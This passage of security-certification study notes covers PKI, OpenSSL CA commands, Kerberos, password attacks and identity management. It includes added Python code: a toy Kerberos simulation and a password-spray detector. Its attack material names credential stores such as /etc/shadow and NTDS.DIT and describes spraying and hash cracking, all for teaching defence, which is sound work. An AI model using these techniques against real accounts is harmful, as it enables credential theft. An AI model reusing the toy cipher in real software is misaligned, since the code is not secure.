○ The SAN field also allows a certificate to represent different subdomains,
such as www.comptia.org and members.comptia.org.

Types of Certificate
● Certificate Policies: A document that defines the different types of certificates
issued by a CA.
● A certificate type is set by configuring the Key Usage attribute.
● The Extended Key Usage (EKU) field—referred to by Microsoft as Enhanced
Key Usage—is a complementary means of defining usage.
○ Typical values used include Server Authentication, Client Authentication,
Code Signing, or Email Protection.
○ In the case of a Key Usage extension marked as critical, an application
should reject the certificate if it cannot resolve the Key Usage value.

Web Server Certificate Types


● Server Certificate: guarantees the identity of e-commerce sites or any sort of
website to which users submit data that should be kept confidential.
● Domain Validation (DV)—proving the ownership of a particular domain.
○ This may be proved by responding to an email to the authorized domain
contact or by publishing a TXT record to the domain.
● Extended Validation (EV)—subjecting to a process that requires more rigorous
checks on the subject's legal identity and control over the domain or software
being signed.

Other Certificate Types


● Machine/Computer Certificates:
○ It might be necessary to issue certificates to machines (servers, PCs,
smartphones, and tablets), regardless of function.
○ For example, in an Active Directory domain, machine certificates could be
issued to Domain Controllers, member servers, or even client
workstations.
○ Machines without valid domain-issued certificates could be prevented from
accessing network resources.
● Email/User Certificate:
○ An email certificate can be used to sign and encrypt email messages.
○ The user's email address must be entered as the SAN and CN.
○ On a directory-based local network, such as Windows Active Directory,
there may be a need for a wider range of user certificate types.
■ For example, in AD there are user certificate templates for standard
users, administrators, smart card logon/users, recovery agent
users, and Exchange mail users (with separate templates for
signature and encryption).
● Code Signing Certificates:
○ issued to a software publisher, following some sort of identity check and
validation process by the CA.
○ The publisher then signs the executables or DLLs that make up the
program to guarantee the validity of a software application or browser
plug-in.
● Root Certificate:
○ is the one that identifies the CA itself.
○ The CN for a root certificate is set to the organization/CA name, such as
"CompTIA Root CA," rather than an FQDN.
● Self-signed Certificates:
○ Any machine, web server, or program code can be deployed with a self-
signed certificate.
○ Self-signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.

Certificate and Key Management


● Key management refers to operational considerations for the various stages in a
key's life cycle.
● A key's life cycle may involve the following stages:
○ Key generation—creating a secure key pair of the required strength, using
the chosen cipher.
○ Certificate generation—to identify the public part of a key pair as
belonging to a subject (user or computer), the subject submits it for
signing by the CA as a digital certificate with the appropriate key usage.
○ Storage—the user must take steps to store the private key securely,
ensuring that unauthorized access and use is prevented.
○ Revocation—if a private key is compromised, the key pair can be revoked
to prevent users from trusting the public key.
○ Expiration and renewal—a certificate key pair that has not been revoked
expires after a certain period. Giving the key or certificate a "shelf-life"
increases security. Certificates can be renewed with new key material.

Key Recovery and Escrow


● M-of-N control, meaning that of N number of administrators permitted to access
the system, M must be present for access to be granted.
○ M must be greater than 1, and N must be greater than M. For example,
when M = 2 and N = 4, any two of four administrators must be present.
● Escrow:
○ In key management, the storage of a backup key with a third party.

Certificate Expiration
● Root certificates might have long expiration dates (10+ years), whereas web
server and user certificates might be issued for 1 year only.
● When you are renewing a certificate, it is possible to use the existing key
(referred to specifically as certificate renewal) or generate a new key (the
certificate is rekeyed).

Certificate Revocation Lists


● A certificate may be revoked or suspended:
○ A revoked certificate is no longer valid and cannot be "un-revoked" or
reinstated.
○ A suspended certificate can be re-enabled.
● A certificate may be revoked or suspended by the owner or by the CA for many
reasons.
○ For example, the certificate or its private key may have been
compromised, the business could have closed, a user could have left the
company, a domain name could have been changed, the certificate could
have been misused in some way, and so on.
● CAs must maintain a certificate revocation list (CRL) of all revoked and
suspended certificates, which can be distributed throughout the hierarchy.
● A CRL has the following attributes:
○ Publish period—the date and time on which the CRL is published. Most
CAs are set up to publish the CRL automatically.
○ Distribution point(s)—the location(s) to which the CRL is published.
○ Validity period—the period during which the CRL is considered
authoritative.
○ Signature—the CRL is signed by the CA to verify its authenticity.

Online Certificate Status Protocol Responders


● Online Certificate Status Protocol (OCSP):
○ Allows clients to request the status of a digital certificate, to check whether
it is revoked.
○ Rather than return a whole CRL, this just communicates the status of the
requested certificate.
● Stapling: Mechanism used to mitigate performance and privacy issues when
requesting certificate status from an OCSP responder.

Certificate Pinning
● Pinning refers to several techniques to ensure that when a client inspects the
certificate presented by a server or a code-signed application, it is inspecting the
proper certificate.
● This might be achieved by embedding the certificate data in the application code,
or by submitting one or more public keys to an HTTP browser via an HTTP
header, which is referred to as HTTP Public Key Pinning (HPKP).

Certificate Formats
● There are various formats for encoding a certificate as a digital file for exchange
between different systems.
● Encoding:
○ Cryptographic data—both certificates and keys—are processed as binary
using Distinguished Encoding Rules (DER).
○ More typically, the binary data is represented as ASCII text characters
using Base64 Privacy-enhanced Electronic Mail (PEM) encoding.
● File Extensions:
○ A three-character file extension is a convention, not a standard, and
unfortunately file extensions do not always map cleanly to the type of
encoding used within a certificate file, or even to the contents of a
certificate file.
○ Both .DER and .PEM can be used as file extensions, although the latter is
not recognized by Windows. .PEM is the most widely used extension for
ASCII format files in Linux.
○ The .CRT and .CER extensions can also be used, but they are not well-
standardized. Most of the confusion arises from the way Windows handles
certificates. In Linux, .CRT is most likely to represent an ASCII certificate.
In Windows, the most common extension is .CER, but this does not tell
you whether the file format is binary or ASCII.
● Contents:
○ The PKCS #12 format allows the export of the private key with the
certificate.
■ This type of file format is usually password-protected and always
binary.
○ The P7B format implements PKCS #7, which is a means of bundling
multiple certificates in the same file.

OpenSSL
● For Linux, CA services are typically implemented using the OpenSSL suite.
● Root CA:
○ To configure a root CA in OpenSSL, set up a directory structure and adapt
an OpenSSL configuration file (openssl.cnf) for any site-local settings. You
then need to create an RSA key pair:
■ openssl genrsa -aes256 -out cakey.pem 4096
○ The -aes256 argument encrypts the key and requires a password to
make use of it.
○ The next step is to use this RSA key pair to generate a self-signed root
X.509 digital certificate:
■ openssl req -config openssl.cnf -key cakey.pem -new -x509 -days 7300 -sha256 -out cacert.pem
● Certificate Signing Requests:
○ To configure a certificate on a host, create a certificate signing request
(CSR) with a new key pair. This command is run on the web server:
■ openssl req -nodes -new -newkey rsa:2048 -out www.csr -keyout www.key
○ This CSR file must then be transmitted to the CA server. On the CA, run
the following command to sign the CSR and output the X.509 certificate:
■ openssl ca -config openssl.cnf -extensions webserver -out www.pem -infiles www.csr

Certificate Issues
● The most common problem when dealing with certificate issues is that of a client
rejecting a server certificate (or slightly less commonly, an authentication server
rejecting a client's certificate).
● If the problem is with an existing certificate that has been working previously,
check that the certificate has not expired or been revoked or suspended.
● If the problem is with a new certificate, check that the key usage settings are
appropriate for the application.
○ Some clients, such as VPN and email clients, have very specific
requirements for key usage configuration.
○ Also, check that the subject name is correctly configured and that the
client is using the correct address.
● If troubleshooting a new certificate that is correctly configured, check that clients
have been configured with the appropriate chain of trust.
○ You need to install root and intermediate CA certificates on the client
before a leaf certificate can be trusted.
● In either case, verify that the time and date settings on the server and client are
synchronized. Incorrect date/time settings are a common cause of certificate
problems.

Lesson 7: Implementing Authentication Controls

Identity and Access Management


● An identity and access management (IAM) system is usually described in
terms of four main processes:
○ Identification—creating an account or ID that uniquely represents the
user, device, or process on the network.
○ Authentication—proving that a subject is who or what it claims to be
when it attempts to access the resource.
○ Authorization—determining what rights subjects should have on each
resource, and enforcing those rights.
○ Accounting—tracking authorized usage of a resource or use of rights by
a subject and alerting when unauthorized use is detected or attempted.
● IAM enables you to define the attributes that make up an entity's identity, such as
its purpose, function, security clearance, and more.

Authentication Factors
● Authentication is performed when the account holder supplies the appropriate
credentials (or authenticators) to the system.
● There are many different technologies for defining credentials, and they can be
categorized as factors.
● Something You Know Authentication:
○ A personal identification number (PIN) is also something you know,
although long PIN codes are hard to remember, and short codes are too
vulnerable for most authentication systems.
● Something You Have Authentication:
○ An ownership factor means that the account holder possesses something
that no one else does, such as a smart card, fob, or wristband
programmed with a unique identity certificate or account number.
● Something You Are/Do Authentication:
○ A biometric factor uses either physiological identifiers, such as a
fingerprint, or behavioral identifiers, such as the way someone moves
(gait).

Authentication Design
● Authentication design refers to selecting a technology that meets requirements
for confidentiality, integrity, and availability.

Multifactor Authentication


● An authentication technology is considered strong if it combines the use of more
than one type of knowledge, ownership, and biometric factor.

Authentication Attributes
● Somewhere You Are Authentication:
○ Location-based authentication measures some statistic about where you
are.
○ This could be a geographic location, measured using a device's location
service, or it could be by IP address.
● Something You Can Do Authentication:
○ Behavioral characteristics, such as the way you walk or the way you hold
your smartphone, can uniquely identify you to a considerable degree of
accuracy.
● Something You Exhibit Authentication:
○ refers to behavioral-based authentication and authorization, with specific
emphasis on personality traits.
○ For example, the way you use smartphone apps or web search engines
might conform to a pattern of behavior that can be captured by machine
learning analysis as a statistical template.
● Someone You Know Authentication:
○ A someone you know authentication scheme uses a web of trust model,
where new users are vouched for by existing users.

Local, Network, and Remote Authentication


● A plaintext password is not usually transmitted or stored in a credential database
because of the risk of compromise. Instead, the password is stored as a
cryptographic hash.
○ When a user enters a password to log in, an authenticator converts what
is typed into a hash and transmits that to an authority.
○ The authority compares the submitted hash to the one in the database
and authenticates the subject only if they match.
● Windows Authentication:
○ Windows local sign-in—the Local Security Authority (LSA) compares the
submitted credential to a hash stored in the Security Accounts Manager
(SAM) database, which is part of the registry.
○ Windows network sign-in—the LSA can pass the credentials for
authentication to a network service.
■ The preferred system for network authentication is based on
Kerberos, but legacy network applications might use NT LAN
Manager (NTLM) authentication.
○ Remote sign-in—if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network
(VPN) or web portal.
● Linux Authentication:
○ In Linux, local user account names are stored in /etc/passwd.
○ When a user logs in to a local interactive shell, the password is checked
against a hash stored in /etc/shadow.
○ A pluggable authentication module (PAM) is a package for enabling
different authentication providers, such as smart-card login.
● Single Sign-On (SSO):
○ A single sign-on (SSO) system allows the user to authenticate once to a
local device and be authenticated to compatible application servers
without having to enter credentials again.

Kerberos Authentication
● Kerberos is a single sign-on network authentication and authorization protocol
used on many networks, notably as implemented by Microsoft's Active Directory
(AD) service.
● Kerberos was named after the three-headed guard dog of Hades (Cerberus)
because it consists of three parts.
● Clients request services from application servers, which both rely on an
intermediary—a Key Distribution Center (KDC)—to vouch for their identity.
● There are two services that make up a KDC: the Authentication Service and the
Ticket Granting Service.

● The Authentication Service is responsible for authenticating user logon requests.
● 1. The client sends the authentication service (AS) a request for a Ticket
Granting Ticket (TGT).
○ This is composed by encrypting the date and time on the local computer
with the user's password hash as the key.
● 2. The AS checks that the user account is present, that it can decode the request
by matching the user's password hash with the one in the Active Directory
database, and that the request has not expired.
○ If the request is valid, the AS responds with the following data:
■ Ticket Granting Ticket (TGT)—this contains information about the
client (name and IP address) plus a timestamp and validity period.
■ Ticket Granting Service (TGS) session key for use in
communications between the client and the TGS.

Kerberos Authorization
● 1. To access resources within the domain, the client requests a Service Ticket (a
token that grants access to a target application server).
○ This process of granting service tickets is handled by the TGS.
● 2. The client sends the TGS a copy of its TGT and the name of the application
server it wishes to access plus an authenticator, consisting of a time-stamped
client ID encrypted using the TGS session key.
● 3. The TGS service responds with:
○ Service session key—for use between the client and the application
server. This is encrypted with the TGS session key.
○ Service ticket—containing information about the user, such as a
timestamp, system IP address, Security Identifier (SID) and the SIDs of
groups to which he or she belongs, and the service session key.
● 4. The client forwards the service ticket, which it cannot decrypt, to the
application server and adds another time-stamped authenticator, which is
encrypted using the service session key.
● 5. The application server decrypts the service ticket to obtain the service session
key using its secret key, confirming that the client has sent an untampered
message.
○ It then decrypts the authenticator using the service session key.
● 6. Optionally, the application server responds to the client with the timestamp
used in the authenticator, which is encrypted by using the service session key.
○ The client decrypts the timestamp and verifies that it matches the value
already sent, and concludes that the application server is trustworthy.
● 7. The server now responds to client requests (assuming they conform to the
server's access control list).
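
The Authentication Service, Ticket Granting Service, and application server exchanges described above, as an added Python example that is not part of the original notes. The `seal`/`unseal` routines are a toy SHA-256/HMAC construction standing in for Kerberos' real ciphers, and the names `alice`, `http/web01`, the 300-second skew, and the SHA-256 password key are assumptions.

```python
import hashlib
import hmac
import json
import os

SKEW = 300  # seconds of clock skew tolerated (assumed value)

def _stream(key, nonce, n):
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]

def seal(key, fields):
    """Toy authenticated encryption; a stand-in for Kerberos' real ciphers."""
    plain = json.dumps(fields).encode()
    nonce = os.urandom(16)
    body = bytes(p ^ s for p, s in zip(plain, _stream(key, nonce, len(plain))))
    return nonce + hmac.new(key, nonce + body, hashlib.sha256).digest() + body

def unseal(key, blob):
    nonce, tag, body = blob[:16], blob[16:48], blob[48:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong key or tampered message")
    plain = bytes(c ^ s for c, s in zip(body, _stream(key, nonce, len(body))))
    return json.loads(plain)

def password_key(password):
    # Stand-in for the stored password hash that serves as the user's key.
    return hashlib.sha256(password.encode()).digest()

class KDC:
    def __init__(self, user_keys, service_keys):
        self.user_keys, self.service_keys = user_keys, service_keys
        self.tgs_key = os.urandom(32)  # known only to the KDC

    def authentication_service(self, user, request, now):
        # Decode the timestamp with the stored hash and check it is fresh.
        if abs(now - unseal(self.user_keys[user], request)["ts"]) > SKEW:
            raise ValueError("request expired")
        session = os.urandom(32).hex()
        tgt = seal(self.tgs_key, {"client": user, "issued": now,
                                  "valid_for": 36000, "session": session})
        return tgt, seal(self.user_keys[user], {"session": session})

    def ticket_granting_service(self, tgt, authenticator, service, now):
        grant = unseal(self.tgs_key, tgt)
        tgs_session = bytes.fromhex(grant["session"])
        auth = unseal(tgs_session, authenticator)
        if auth["client"] != grant["client"] or abs(now - auth["ts"]) > SKEW:
            raise ValueError("bad authenticator")
        if now > grant["issued"] + grant["valid_for"]:
            raise ValueError("TGT expired")
        session = os.urandom(32).hex()
        ticket = seal(self.service_keys[service],
                      {"client": grant["client"], "issued": now, "session": session})
        return ticket, seal(tgs_session, {"session": session})

class AppServer:
    def __init__(self, key):
        self.key = key

    def accept(self, ticket, authenticator, now):
        svc = unseal(self.key, ticket)  # only the server's secret key opens it
        session = bytes.fromhex(svc["session"])
        auth = unseal(session, authenticator)
        if auth["client"] != svc["client"] or abs(now - auth["ts"]) > SKEW:
            raise ValueError("authenticator does not match ticket")
        return svc["client"], seal(session, {"ts": auth["ts"]})  # optional reply

def run_exchange(password="correct horse", now=1_700_000_000):
    user_key, web_key = password_key("correct horse"), os.urandom(32)
    kdc = KDC({"alice": user_key}, {"http/web01": web_key})
    web = AppServer(web_key)
    client_key = password_key(password)  # what the user actually typed

    # Authentication: TGT request, then TGT plus TGS session key.
    tgt, reply = kdc.authentication_service("alice", seal(client_key, {"ts": now}), now)
    tgs_session = bytes.fromhex(unseal(client_key, reply)["session"])
    try:
        unseal(client_key, tgt)
        tgt_opaque = False
    except ValueError:
        tgt_opaque = True  # the client holds the TGT but cannot read it

    # Authorization: TGT plus authenticator buys a service ticket.
    auth = seal(tgs_session, {"client": "alice", "ts": now})
    ticket, reply = kdc.ticket_granting_service(tgt, auth, "http/web01", now)
    svc_session = bytes.fromhex(unseal(tgs_session, reply)["session"])

    # Service ticket plus a new authenticator go to the application server.
    who, proof = web.accept(ticket, seal(svc_session, {"client": "alice", "ts": now}), now)
    return {"server_sees": who, "tgt_opaque_to_client": tgt_opaque,
            "mutual_auth": unseal(svc_session, proof)["ts"] == now}
```

The password itself never crosses the wire, and a wrong password fails at the Authentication Service because the request cannot be decoded with the stored key.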

PAP, CHAP, and MS-CHAP Authentication
● PAP:
○ an unsophisticated authentication method developed as part of the Point-
to-Point Protocol (PPP), used to transfer TCP/IP data over serial or dial-up
connections.
○ It relies on cleartext password exchange and is therefore obsolete for
most purposes, except through an encrypted tunnel.
● CHAP:
○ also developed as part of PPP as a means of authenticating users over a
remote link.
○ CHAP relies on an encrypted challenge in a system called a three-way
handshake.
○ 1. Challenge—the server challenges the client, sending a randomly
generated challenge message.
○ 2. Response—the client responds with a hash calculated from the server
challenge message and client password (or other shared secret).
○ 3. Verification—the server performs its own hash using the password hash
stored for the client. If it matches the response, then access is granted;
otherwise, the connection is dropped.
○ This guards against replay attacks, in which a previous session could be
captured and reused to gain access.
● MS-CHAPv2:
○ Implementation of CHAP created by Microsoft for use in its products.

Password Attacks
● When a user chooses a password, the password is converted to a hash using a
cryptographic function, such as MD5 or SHA.
● Plaintext/Unencrypted Attacks:
○ A plaintext/unencrypted attack exploits password storage or a network
authentication protocol that does not use encryption.
● Online Attacks:
○ An online password attack is where the threat actor interacts with the
authentication service directly—a web login form or VPN gateway, for
instance.
○ The attacker submits passwords using either a database of known
passwords (and variations) or a list of passwords that have been cracked
offline.
● Password Spraying:
○ a horizontal brute-force online attack.
○ This means that the attacker chooses one or more common passwords
(for example, password or 123456) and tries them in conjunction with
multiple usernames.
● Offline Attacks:
○ An offline attack means that the attacker has managed to obtain a
database of password hashes, such as %SystemRoot%\System32\config\SAM,
%SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store), or
/etc/shadow.
○ Threat actors can also read credentials from host memory, in which case
the only reliable indicator might be the presence of attack tools on a host.
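
Detection logic for the online attacks described above, as an added Python example that is not part of the original notes. It separates password spraying (few attempts against many usernames) from a brute-force run against one account; the log format, the sample lines, and the thresholds are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (documentation IP ranges).
SAMPLE_LOG = """\
2024-05-01T09:00:01Z FAIL user=alice src=203.0.113.7
2024-05-01T09:00:04Z FAIL user=bob src=203.0.113.7
2024-05-01T09:00:07Z FAIL user=carol src=203.0.113.7
2024-05-01T09:00:10Z FAIL user=dave src=203.0.113.7
2024-05-01T09:00:13Z FAIL user=erin src=203.0.113.7
2024-05-01T09:00:16Z FAIL user=frank src=203.0.113.7
2024-05-01T09:05:00Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:01Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:02Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:03Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:04Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:05Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:06Z FAIL user=admin src=198.51.100.23
2024-05-01T09:05:07Z FAIL user=admin src=198.51.100.23
2024-05-01T09:10:00Z FAIL user=alice src=192.0.2.10
2024-05-01T09:10:20Z FAIL user=alice src=192.0.2.10
2024-05-01T09:10:45Z OK user=alice src=192.0.2.10
"""

def parse(line):
    ts, result, user_kv, src_kv = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return when, result, user_kv.split("=", 1)[1], src_kv.split("=", 1)[1]

def classify_sources(log_text, window=timedelta(minutes=10),
                     min_users=5, max_per_user=2, min_attempts=8):
    """Map each suspicious source address to 'password-spray' or 'brute-force'."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            when, result, user, src = parse(line)
            if result == "FAIL":
                failures[src].append((when, user))

    findings = {}
    for src, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window so it never spans more than `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in events[start:end + 1]:
                per_user[user] += 1
            # Horizontal: many distinct accounts, only a try or two each.
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings[src] = "password-spray"
                break
            # Vertical: one account hammered repeatedly.
            if max(per_user.values()) >= min_attempts:
                findings[src] = "brute-force"
                break
    return findings
```

Per-account lockout counters miss the first pattern because no single account exceeds its limit, which is why the grouping key here is the source address rather than the username.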

Brute Force and Dictionary Attacks


● A brute-force attack attempts every possible combination in the output space in
order to match a captured hash and guess at the plaintext that generated it.
○ The output space is determined by the number of bits used by the
algorithm (128-bit MD5 or 256-bit SHA256, for instance).
○ The larger the output space and the more characters that were used in the
plaintext password, the more difficult it is to compute and test each
possible hash to find a match.
● Dictionary and Rainbow Table Attacks:
○ A dictionary attack can be used where there is a good chance of
guessing the likely value of the plaintext, such as a non-complex
password.
■ The software generates hash values from a dictionary of plaintexts
to try to match one to a captured hash.
○ Rainbow Table: The attacker uses a precomputed lookup table of all
possible passwords and their matching hashes.
■ The hash value of a stored password can then be looked up in the
table and the corresponding plaintext discovered.
● Hybrid Attack:
○ A hybrid password attack uses a combination of attack methods when
trying to crack a password.
○ A typical hybrid password attack uses a combination of dictionary and
brute force attacks.

Password Crackers
● Password guessing software can attempt to crack captured hashes of user
credentials by running through all possible combinations (brute force).
● Hashcat: Command-line tool used to perform brute force and dictionary attacks
against password hashes.

Authentication Management
● An authentication management solution for passwords mitigates this risk by
using a device or service as a proxy for credential storage.
● The manager generates a unique, strong password for each web-based account.
● Password managers can be implemented with a hardware token or as a software
app:
○ Password key—USB tokens for connecting to PCs and smartphones.
Some can use near-field communication (NFC) or Bluetooth as well as
physical connectivity.
○ Password vault—software-based password manager, typically using a
cloud service to allow access from any device.

Smart-Card Authentication
● means programming cryptographic information onto a card equipped with a
secure processing chip.
● The chip stores the user's digital certificate, the private key associated with the
certificate, and a personal identification number (PIN) used to activate the card.
● For Kerberos authentication, smart-card logon works as follows:
○ 1. The user presents the smart card to a reader and is prompted to enter a
PIN.
○ 2. Inputting the correct PIN authorizes the smart card's cryptoprocessor to
use its private key to create a Ticket Granting Ticket (TGT) request, which
is transmitted to the authentication server (AS).
○ 3. The AS is able to decrypt the request because it has a matching public
key and trusts the user's certificate, either because it was issued by a local
certification authority or by a third-party CA that is a trusted root CA.
○ 4. The AS responds with the TGT and Ticket Granting Service (TGS)
session key.

Key Management Devices


● When using public key infrastructure (PKI) for smart-card authentication, the
security of the private key issued to each user is critical.
● Various technologies can be used to avoid the need for an administrator to
generate a private key and transmit it to the user:
○ Smart card—some cards are powerful enough to generate key material
using the cryptoprocessor embedded in the card.
○ USB key—a cryptoprocessor can also be implemented in the USB form
factor.
○ Trusted Platform Module (TPM)—a secure cryptoprocessor enclave
implemented on a PC, laptop, smartphone, or network appliance.
● A hardware security module (HSM) is a network appliance designed to perform
centralized PKI management for a network of devices.
○ This means that it can act as an archive or escrow for keys in case of loss
or damage.
○ HSMs are designed to be both tamper-resistant to prevent unauthorized
access and tamper-evident to clearly show any signs of attempted
intrusion, thereby mitigating the risk of insider threats.

Extensible Authentication Protocol/IEEE 802.1X


● The smart-card authentication process described earlier is used for Kerberos
authentication where the computer is attached to the local network and the user
is logging on to Windows.
● Authentication may also be required in other contexts:
○ When the user is accessing a wireless network and needs to authenticate
with the network database.
○ When a device is connecting to a network via a switch and network
policies require the user to be authenticated before the device is allowed
to communicate.
○ When the user is connecting to the network over a public network via a
virtual private network (VPN).
● Extensible Authentication Protocol (EAP) provides a framework for deploying
multiple types of authentication protocols and technologies.
○ Many of them use a digital certificate on the server and/or client machines.
○ This allows the machines to establish a trust relationship and create a
secure tunnel to transmit the user credential or to perform smart-card
authentication without a user password.
● IEEE 802.1X: A standard for encapsulating EAP communications over a LAN
(EAPoL) to implement port-based authentication.
● 802.1X uses authentication, authorization, and accounting (AAA) architecture:
○ Supplicant—the device requesting access, such as a user's PC or laptop.
○ Network access server (NAS)—edge network appliances, such as
switches, access points, and VPN gateways. These are also referred to as
RADIUS clients or authenticators.
○ AAA server—the authentication server, positioned within the local
network.

Remote Authentication Dial-In User Service


● A standard protocol used to manage remote and wireless authentication
infrastructures.
● The Network Access Server (NAS)/Network Access Point (NAP) device (RADIUS
client) is configured with the IP address of the RADIUS server and with a shared
secret.
● A generic RADIUS authentication workflow process is as follows:

Terminal Access Controller Access-Control System


● An AAA protocol developed by Cisco that is often used to authenticate to
administrator accounts for network appliance management.
● TACACS+ uses TCP communications (over port 49), and this reliable,
connection-oriented delivery makes it easier to detect when a server is down.
● All the data in TACACS+ packets is encrypted (except for the header identifying
the packet as TACACS+ data), rather than just the authentication data.

Token Keys and Static Codes
● Smart-card authentication works well when you have close control over user
accounts and the devices used on the network.
● Token: A physical or virtual item that contains authentication and/or authorization
data, commonly used in multifactor authentication.
● A one-time password (OTP) is one that is generated automatically, rather than
being chosen by a user, and used only once.
○ An OTP is generated using some sort of hash function on a secret value
plus a synchronization value (seed), such as a timestamp or counter.
● The device generates a passcode based on the current time and a secret key
coded into the device.

Open Authentication
● The Initiative for Open Authentication (OATH) is an industry body established
with the aim of developing an open, strong authentication framework.
○ Open means a system that any enterprise can link into to perform
authentication of users and devices across different networks.
○ Strong means that the system is based not just on passwords, but also on
2- or 3-factor authentication or on 2-step verification.
● HMAC-Based One-Time Password Algorithm (HOTP):
○ An algorithm that generates a one-time password using a hash-based
authentication code to verify the authenticity of the message.
○ The authentication server and client token are configured with the same
shared secret.
■ This should be an 8-byte value generated by a cryptographically
strong random number generator.
○ The shared secret can be transmitted to the smartphone app as a QR
code image acquirable by the phone's camera so that the user doesn't
have to type anything.
● Time-Based One-Time Password Algorithm (TOTP):
○ An improvement on HOTP that forces one-time passwords to expire after
a short period of time.
○ In TOTP, the HMAC is built from the shared secret plus a value derived
from the device's and server's local timestamps.
○ TOTP automatically expires each token after a short window (60 seconds,
for instance).
■ For this to work, the client device and server must be closely time-
synchronized.

2-Step Verification
● 2-step verification or out-of-band mechanisms generate a software token on a
server and send it to a resource assumed to be safely controlled by the user.
● The token can be transmitted to the device in a number of ways:
○ Short Message Service (SMS)—the code is sent as a text to the
registered phone number.
○ Phone call—the code is delivered as an automated voice call to the
registered phone number.
○ Push notification—the code is sent to a registered authenticator app on
the PC or smartphone.
○ Email—the code is sent to a registered email account.

Biometric Authentication
● The first step in setting up biometric authentication is enrollment.
● The chosen biometric information is scanned by a biometric reader and
converted to binary information.
● The biometric template is kept in the authentication server's database.
○ When the user wants to access a resource, he or she is re-scanned, and
the scan is compared to the template.
○ If they match to within a defined degree of tolerance, access is granted.
● Key metrics and considerations used to evaluate the efficacy rate of biometric
pattern acquisition and matching and suitability as an authentication mechanism
include the following:
○ False Rejection Rate (FRR)—where a legitimate user is not recognized.
○ False Acceptance Rate (FAR)—where an interloper is accepted (Type II
error or false match rate [FMR]). FAR is measured as a percentage.
○ False rejections cause inconvenience to users, but false acceptance can
lead to security breaches, and so is usually considered the most important
metric.
○ Crossover Error Rate (CER)—the point at which FRR and FAR meet.
The lower the CER, the more efficient and reliable the technology.
○ Throughput (speed)—the time required to create a template for each user
and the time required to authenticate.

Fingerprint Recognition
● A fingerprint sensor is usually implemented as a small capacitive cell that can
detect the unique pattern of ridges making up the fingerprint.
● The main problem with fingerprint scanners is that it is possible to obtain a
copy of a user's fingerprint and create a mold of it that will fool the scanner.
○ These concerns are addressed by vein matching scanners, or vascular
biometrics.

Facial Recognition
● Facial recognition records multiple indicators about the size and shape of the
face, like the distance between each eye, or the width and length of the nose.
● Facial recognition suffers from relatively high false acceptance and rejection
rates and can be vulnerable to spoofing.

Behavioral Technologies
● The variations in motion, pressure, or gait are supposed to uniquely verify each
individual.
● In practice, however, these methods are subject to higher error rates, and are
much more troublesome for a subject to perform.
● Voice recognition—relatively cheap, as the hardware and software required are
built into many standard PCs and mobiles.
● Gait analysis—produces a template from human movement (locomotion).
● Signature recognition—signatures are relatively easy to duplicate, but it is more
difficult to fake the actual signing process.
● Typing—matches the speed and pattern of a user’s input of a passphrase.

Lesson 8: Implementing Identity and Account Management Controls

Identity Management Controls


● Certificates and Smart Cards:
○ Public key infrastructure (PKI) allows the management of digital identities,
where a certificate authority (CA) issues certificates to validated subjects
(users and servers).
○ The subject's public key is part of a pair with a linked private key.
● Tokens:
○ In a single sign-on system, the user authenticates to an identity provider
(IdP) and receives a cryptographic token.
○ The user can present that token to compatible applications as proof they
are authenticated, and receive authorizations from the application.
● Identity Providers:
○ The identity provider is the service that provisions the user account and
processes authentication requests.

Background Check and Onboarding Policies


● Personnel management policies are applied in three phases:
○ Recruitment (hiring)—locating and selecting people to work in particular
job roles. Security issues here include screening candidates and
performing background checks.
○ Operation (working)—it is often the HR department that manages the
communication of policy and training to employees (though there may be
a separate training and personal development department within larger
organizations).
○ Termination or separation (firing or retiring)—whether an employee leaves
voluntarily or involuntarily, termination is a difficult process, with numerous
security implications.
● Onboarding:
○ Onboarding at the HR level is the process of welcoming a new employee
to the organization.
○ Secure transmission of credentials—creating and sending an initial
password or issuing a smart card securely.
○ Asset allocation—provision computers or mobile devices for the user or
agree to the use of bring-your-own-device handsets.
○ Training/policies—schedule appropriate security awareness and
role-relevant training and certification.
● Non-Disclosure Agreement (NDA):
○ An agreement that stipulates that entities will not share confidential
information, knowledge, or materials with unauthorized third parties.

Personnel Policies for Privilege Management


● Separation of Duties:
○ A concept that states that duties and responsibilities should be divided
among individuals to prevent ethical conflicts or abuse of powers.
● Least Privilege:
○ Means that a user is granted sufficient rights to perform his or her job and
no more.
● Job Rotation:
○ (or rotation of duties) means that no one person is permitted to remain in
the same job for an extended period.
● Mandatory Vacation:
○ Means that employees are forced to take their vacation time, during which
someone else fulfills their duties.
○ During that time, the corporate audit and security employees have time to
investigate and discover any discrepancies in employee activity.

Offboarding Policies
● The process of ensuring that all HR and other requirements are covered when an
employee leaves an organization.
● Account management—disable the user account and privileges.
● Company assets—retrieve mobile devices, keys, smart cards, USB media, and
so on.
● Personal assets—wipe employee-owned devices of corporate data and
applications.

Security Account Types and Credential Management


● Credential Management Policies for Personnel:
○ Improper credential management continues to be one of the most fruitful
vectors for network attacks.
○ A credential management policy should instruct users on how to keep their
authentication method secure, whether this be a password, smart card, or
biometric ID.
● Guest Accounts:
○ A guest account is a special type of shared account with no password. It
allows anonymous and unauthenticated access to a resource.

Security Group-Based Privileges


● One approach to network privilege management is to assign privileges directly to
user accounts.
● Group Account:
○ A collection of user accounts that are useful when establishing file
permissions and user rights because when many individuals need the
same level of access, a group could be established containing all the
relevant users.

Administrator/Root Accounts
● A default account is one that is created by the operating system or application
when it is installed.
○ In Windows, this account is called Administrator; in Linux, it is called root.
● Generic Administrator Account Management:
